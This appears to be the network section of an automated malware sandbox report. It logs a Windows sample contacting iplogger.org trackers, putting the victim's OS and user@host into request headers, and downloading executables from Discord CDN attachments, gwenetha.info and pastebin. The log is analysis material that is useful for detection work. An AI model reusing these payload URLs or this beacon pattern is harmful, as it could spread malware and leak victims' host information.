Network Analysis
Name | Response | Post-Analysis Lookup
---|---|---
edgedl.gvt1.com | 142.250.34.2 |
pastebin.com | 104.23.99.190 |
iplogger.org | 88.99.66.31 |
whatitis.website | |
gwenetha.info | 104.21.12.27 |
cdn.discordapp.com | 162.159.130.233 |
TCP Requests
- 192.168.56.102:49814 -> 104.23.98.190:443 (pastebin.com)
- 192.168.56.102:49816 -> 142.250.34.2:80 (edgedl.gvt1.com)
- 192.168.56.102:49815 -> 142.250.66.131:443
- 192.168.56.102:49809 -> 162.159.130.233:443 (cdn.discordapp.com)
- 192.168.56.102:49812 -> 162.159.130.233:443 (cdn.discordapp.com)
- 192.168.56.102:49813 -> 162.159.130.233:443 (cdn.discordapp.com)
- 192.168.56.102:49818 -> 162.159.130.233:443 (cdn.discordapp.com)
- 192.168.56.102:49820 -> 162.159.130.233:443 (cdn.discordapp.com)
- 192.168.56.102:49821 -> 162.159.130.233:443 (cdn.discordapp.com)
- 192.168.56.102:49822 -> 162.159.130.233:443 (cdn.discordapp.com)
- 192.168.56.102:49797 -> 172.217.25.14:443
- 192.168.56.102:49817 -> 172.67.131.232:443 (gwenetha.info)
- 192.168.56.102:49808 -> 203.159.80.228:80
- 192.168.56.102:49824 -> 216.58.220.195:443
- 192.168.56.102:49825 -> 216.58.220.195:443
- 192.168.56.102:49805 -> 88.99.66.31:443 (iplogger.org)
- 192.168.56.102:49819 -> 88.99.66.31:443 (iplogger.org)
UDP Requests
- 192.168.56.102:50538 -> 164.124.101.2:53
- 192.168.56.102:50839 -> 164.124.101.2:53
- 192.168.56.102:54221 -> 164.124.101.2:53
- 192.168.56.102:54660 -> 164.124.101.2:53
- 192.168.56.102:57660 -> 164.124.101.2:53
- 192.168.56.102:61459 -> 164.124.101.2:53
- 192.168.56.102:61998 -> 164.124.101.2:53
- 192.168.56.102:62039 -> 164.124.101.2:53
- 192.168.56.102:62461 -> 164.124.101.2:53
- 192.168.56.102:137 -> 192.168.56.255:137
- 192.168.56.102:138 -> 192.168.56.255:138
- 192.168.56.102:49152 -> 239.255.255.250:3702
- 192.168.56.102:56752 -> 239.255.255.250:1900
- 192.168.56.102:56754 -> 239.255.255.250:3702
- 192.168.56.102:56756 -> 239.255.255.250:3702
- 192.168.56.102:61460 -> 239.255.255.250:3702

GET https://iplogger.org/1xPHh7 -> 200
GET /1xPHh7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Apr 2021 04:21:18 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=43jhm26i7cvvbmekc0t994tig1; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451713; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY

GET https://iplogger.org/2CQAB5.exe -> 301
GET /2CQAB5.exe HTTP/1.1
Host: iplogger.org
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Apr 2021 04:21:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ntrietnplolbn63cfi8er9spl1; path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451712; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://cdn.discordapp.com/attachments/826198252025675816/826537386485612574/china.png
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY

GET https://cdn.discordapp.com/attachments/826198252025675816/826537386485612574/china.png -> 200
GET /attachments/826198252025675816/826537386485612574/china.png HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:21:19 GMT
Content-Type: image/png
Content-Length: 7680
Connection: keep-alive
Set-Cookie: __cfduid=df321f498f10b91584304ea0d7694a6c31617596479; expires=Wed, 05-May-21 04:21:19 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affd2ee92ea249-ICN
Accept-Ranges: bytes
Age: 451491
Cache-Control: public, max-age=31536000
ETag: "6be41709f8bfbf06307cc56d04249801"
Expires: Tue, 05 Apr 2022 04:21:19 GMT
Last-Modified: Tue, 30 Mar 2021 19:24:29 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dc914e0000a249e5308000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617132269285743
x-goog-hash: crc32c=aF03UA==
x-goog-hash: md5=a+QXCfi/vwYwfMVtBCSYAQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7680
X-GUploader-UploadID: ABg5-UxiLDAZpR0Y2Z-4q6HmHSbdJu2Aw-itbIW-AA7MULcbcKMNQuhX9Jwm3JIVWTkUW9lL6Zi8VfeBlfDJSccdNIEhbl2dsA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=33FgSxMT2IFWZUZhoB%2BGfvr2%2BjN2bP4efX7%2F1rjkzHBJHPIgFoAlHnfB1MXqS7FE3ZC%2B2zp1n9291bSgPfajxOAfCJO6Rfb5tsbJRbigFHTp6JI%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare

GET https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe -> 403
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:21:21 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=dc3c8df79e420aef37d62925d70899c9c1617596481; expires=Wed, 05-May-21 04:21:21 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affd381f3fa249-ICN
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:21 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dc97130000a249fe01c000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kPTE86Ip9%2Fqqnby%2BB4uN9mkz9%2BnNkf4JrzXQW0QUuHLJYGIp9SJLC%2BZx3IibTQIR8FKoluoYGktnlyI4vgXfz59yr4bSEZGY8P1r94RTfIOdTl0%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare

GET https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe -> 403
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:21:21 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d605fe05df2ecdf414f26d19a60dcc44f1617596481; expires=Wed, 05-May-21 04:21:21 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affd382b130284-ICN
Age: 7171
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 02:21:50 GMT
Vary: Accept-Encoding
CF-Cache-Status: UPDATING
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dc971c00000284fb9be000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UxM9mW_5v2OmOFnTtca1jtfaQztMhoN1oeSnXshGvUQXdEDs3QBo0qx4CYCaKa3chT0L5y__oICpZif_IlFJRuintX-lg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LuvZMBMsA2lF78o%2Fk%2BqKDEHHfPAb2JLCqhaw8315P8p7y0qoocewURVylxU0N3TLjoBg2VSotnOMpilFHk7PkH9Mmj8nHWrJ0bIT6e%2FaBfbphMM%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare

GET https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe -> 403
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:21:21 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d9b3432133bd538be67e0754393f9c73a1617596481; expires=Wed, 05-May-21 04:21:21 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affd39aeec00d3-ICN
Age: 0
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:21 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dc9805000000d331bb4000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tRQpwoZvcsyC9ZNnf1NZgAZ7ViuGr9zdwCTMWKu9GBquOmBWFoUtfyNG2LOHjmIZ5WJq2tltUEDIEEpF9sYGDGSmxTC9vLbEankcF3JAVaMgGyc%3D"}]}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare

POST https://update.googleapis.com/service/update2?cup2key=10:2761306227&cup2hreq=71b51d9ea15a088b2af84ffd33921119eb65dcd4b9b4898e9e4276f19445345c -> 200
POST /service/update2?cup2key=10:2761306227&cup2hreq=71b51d9ea15a088b2af84ffd33921119eb65dcd4b9b4898e9e4276f19445345c HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Google Update/1.3.36.32;winhttp;cup-ecdsa
X-Old-UID: cnt=0
X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96}
X-Goog-Update-Updater: Omaha-1.3.36.32
X-Goog-Update-Interactivity: bg
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Content-Length: 1202
Host: update.googleapis.com
HTTP/1.1 200 OK
Content-Security-Policy: script-src 'report-sample' 'nonce-94amkTHoOMZd/xDWOmHFYw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Apr 2021 04:21:26 GMT
X-Cup-Server-Proof: 3046022100bed6a492ec0d3e8b0f5729b7df31af546628950edf766d3559eb3f6817a8f618022100ac033164216b0f31803fd97ed8d8569c92119705ff08b5b4b937df5f2e33deab:71b51d9ea15a088b2af84ffd33921119eb65dcd4b9b4898e9e4276f19445345c
Content-Type: text/xml; charset=UTF-8
X-Daynum: 5207
X-Daystart: 76886
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked

GET https://iplogger.org/1iPtu7 -> 200
GET /1iPtu7 HTTP/1.1
Host: iplogger.org
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Apr 2021 04:21:34 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=rtundue2ffdimmsir5ma1gkr95; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451697; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY

GET https://pastebin.com/raw/gCyjHCCH -> 200
GET /raw/gCyjHCCH HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:21:35 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db2e1ac02aa562fecf2898246bdf21d0a1617596494; expires=Wed, 05-May-21 04:21:34 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
cf-request-id: 0941dccb1100000284b50dd000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 63affd8b4c440284-ICN

GET https://gwenetha.info/setup-KGQJ-1.exe -> 404
GET /setup-KGQJ-1.exe HTTP/1.1
Host: gwenetha.info
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Mon, 05 Apr 2021 04:21:54 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 19
Connection: keep-alive
Set-Cookie: __cfduid=d98100dc0ab336fb64ff161b55ce378ea1617596514; expires=Wed, 05-May-21 04:21:54 GMT; path=/; domain=.gwenetha.info; HttpOnly; SameSite=Lax
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
cf-request-id: 0941dd1903000042a505992000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qYHryEbfgaYUGEGRg8sj9CFBSzikuMNvu5JZQA%2BTQm5yDlOUSzgogB%2FC6%2FoTNTuNMbbcPAlx31bcASu%2BESXZnT8U%2BIqkMcH09ZeB%2B%2B%2FM"}]}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63affe0808d342a5-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET https://cdn.discordapp.com/attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe -> 403
GET /attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:21:55 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d87e2ef5ef19e827792e71fcbe375f3cf1617596514; expires=Wed, 05-May-21 04:21:54 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affe0a7c54fffc-ICN
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:55 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dd1a890000fffc110dc000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uy0DBZJ4PhYaAXNgHdhHtQPXr-fMEjb214k4lBMCsgfAwX3FQoZ4J4-MeRNNmimijjA9VnigLiWft_v8_ovP2E
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FRfyt0n3tOb0mk2J8eCZ%2BWV%2BJzinVQ4UvTdlCThyCFfoPkgMNIwlB72Md0u%2FT8JxAP97AaENnEKDhMoTi75dDmYAqoMuDiCRVByCflAluvpbtB4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare

GET https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe -> 200
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:21:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d320e0145b20ed5d1a0a88c97cc1813d51617596515; expires=Wed, 05-May-21 04:21:55 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 0941dd1bcf000012dabb1c8000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UbFb0mITie5hYGkPtvh3nKYN8rnO1FvilBp6P5xixtEDzPn5dSduwLc6O%2BmM8qTxP2Qp4ZdbhEZD%2B9eqr%2FyaSa%2FRzFZAhD0Eo6C3AQxKKXGUQ1w%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63affe0c78cc12da-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET https://cdn.discordapp.com/attachments/826416818390040589/826855866228670474/7525b875715555.exe -> 403
GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:21:55 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d320e0145b20ed5d1a0a88c97cc1813d51617596515; expires=Wed, 05-May-21 04:21:55 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affe0dec9912da-ICN
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:55 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dd1cb2000012da0339f000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyFfb0ju1UrZ8d3NVFfJE2mzlIJ6zA-jrpBc5Sed9FaHeB6-X5SNWuiJVWee-3nAVZmMLnfGcMql2KTa7C362jNEp-T7Q
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HK638qjqB99kW%2BHTxiZpy8yk%2F9GU%2BxaspigLQWY%2Bbt8gXKepZruRZ3%2Fkr5zHlFx7pYRb2QZsrgRbq%2FjMn9T7F5Zluar0DNxutekfiqVkfyfFeM0%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare

GET https://iplogger.org/2LehR6.exe -> 301
GET /2LehR6.exe HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Apr 2021 04:21:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=j6tlsqgbaajed1u0bngnctd8k6; path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451674; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY

GET https://cdn.discordapp.com/attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe -> 200
GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:22:22 GMT
Content-Type: application/x-msdos-program
Content-Length: 505856
Connection: keep-alive
Set-Cookie: __cfduid=d4cd09ae93be6016b15fa13e074f315eb1617596542; expires=Wed, 05-May-21 04:22:22 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affeb8cc98a273-ICN
Accept-Ranges: bytes
Age: 451551
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
ETag: "28345a7bb63babaf99e760965ce493b7"
Expires: Tue, 05 Apr 2022 04:22:22 GMT
Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dd87810000a27380943000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617132901889175
x-goog-hash: crc32c=Ws/4nQ==
x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 505856
X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=yVAcKIctmJ60MyU6AzKNqQe%2BJjYSr1rvrQ5Y2JS343sR5hHoXHWgLryOzMVPPAFJ67JHNoJjQbY6BAdqKzq46ISEFhfqWDqyBpl3QmIXpFY3cZg%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare

GET https://cdn.discordapp.com/attachments/826416818390040589/826469949593485312/file.exe -> 403
GET /attachments/826416818390040589/826469949593485312/file.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:22:27 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=de8b89d5a96e34cc6f6bf3bc90aa7c9f41617596546; expires=Wed, 05-May-21 04:22:26 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affed25f64a1dd-ICN
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:22:27 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dd97750000a1dd488eb000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uz26yCKX_mnm6Nq82REhI6Fx_B21T6sSzasO3o7WjHseapUVbZdAIUTBzRlptQQvF8aBJBvqa2sWRPCuaJyXZft1yNPFg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6s1K0OyvzKz6qjb9YED7rEn6MZVTgMUu3Nt%2B2W6lD6a7mXiqWD8oq%2BzBw9RMmhnNO9wj7cAedB8PBtZ9m0pjEjmhrv63GaRBu1t1Jw8oxRCOxKg%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare

GET https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe -> 200
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:22:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dbdb52ef6254f6582d01f67c601d9c2921617596546; expires=Wed, 05-May-21 04:22:26 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 0941dd979c0000a273733c6000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zvstFQiumAZrLs9lRPZdwtyFJ%2BRSjC86J9FImex0GZa7Rc9xfBhaHtklhgGSsvIoH0d0IDCtyHKf2WWa2x7Klp7S4yboe4aWNyzKWrD%2Fs7Z1NkY%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63affed29943a273-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

POST https://update.googleapis.com/service/update2 -> 200
POST /service/update2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Google Update/1.3.36.32;winhttp
X-Old-UID: cnt=0
X-Goog-Update-Updater: Omaha-1.3.36.32
X-Goog-Update-Interactivity: bg
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Content-Length: 1598
Host: update.googleapis.com
HTTP/1.1 200 OK
Content-Security-Policy: script-src 'report-sample' 'nonce-M7tlWubnM0ZS7qNNujCMKQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Apr 2021 04:22:39 GMT
Content-Type: text/xml; charset=UTF-8
X-Daynum: 5207
X-Daystart: 76959
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
